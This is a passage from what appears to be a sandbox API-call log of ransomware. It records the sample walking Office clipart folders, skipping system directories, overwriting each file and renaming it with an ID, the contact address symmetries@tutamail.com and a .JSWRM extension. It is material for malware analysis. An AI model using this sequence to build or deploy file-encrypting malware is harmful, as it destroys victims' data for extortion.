lpWideCharStr="AN04206_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04206_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04206_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.275] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7668) returned 1 [0074.275] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1df0) returned 0x24c1d0 [0074.275] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1df0, lpOverlapped=0x0) returned 1 [0074.277] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.277] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1df0, lpOverlapped=0x0) returned 1 [0074.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.277] CloseHandle (hObject=0x460) returned 1 [0074.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0074.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0074.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0074.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0074.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0074.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.277] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0074.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.278] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x212c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04225_.WMF", cAlternateFileName="")) returned 1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2=".") returned 1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="..") returned 1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="...") returned 1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="windows") returned -1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="recovery") returned -1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="perflogs") returned -1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="documents and settings") returned -1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="system volume information") returned -1 [0074.278] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="msocache") returned -1 [0074.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04225_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04225_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04225_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04225_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04225_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04225_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.279] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8492) returned 1 [0074.279] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2120) returned 0x24c1d0 [0074.279] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2120, lpOverlapped=0x0) returned 1 [0074.281] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.281] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2120, lpOverlapped=0x0) returned 1 [0074.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.281] CloseHandle (hObject=0x460) returned 1 [0074.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0074.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0074.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0074.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0074.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0074.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.281] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0074.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.282] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04235_.WMF", cAlternateFileName="")) returned 1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2=".") returned 1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="..") returned 1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="...") returned 1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="windows") returned -1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="recovery") returned -1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="perflogs") returned -1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="documents and settings") returned -1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="system volume information") returned -1 [0074.282] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="msocache") returned -1 [0074.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0074.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04235_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04235_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04235_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0074.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0074.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04235_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04235_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04235_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0074.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.283] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7804) returned 1 [0074.283] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e70) returned 0x24c1d0 [0074.284] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1e70, lpOverlapped=0x0) returned 1 [0074.285] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.285] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1e70, lpOverlapped=0x0) returned 1 [0074.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.285] CloseHandle (hObject=0x460) returned 1 [0074.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0074.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0074.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0074.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0074.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0074.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.286] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0074.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.286] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc89dc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc89dc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04267_.WMF", cAlternateFileName="")) returned 1 [0074.286] lstrcmpiW (lpString1="AN04267_.WMF", lpString2=".") returned 1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="..") returned 1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="...") returned 1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="windows") returned -1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="recovery") returned -1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="perflogs") returned -1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="documents and settings") returned -1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="system volume information") returned -1 [0074.287] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="msocache") returned -1 [0074.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0074.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04267_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04267_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04267_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0074.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04267_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04267_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04267_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.287] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7804) returned 1 [0074.287] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 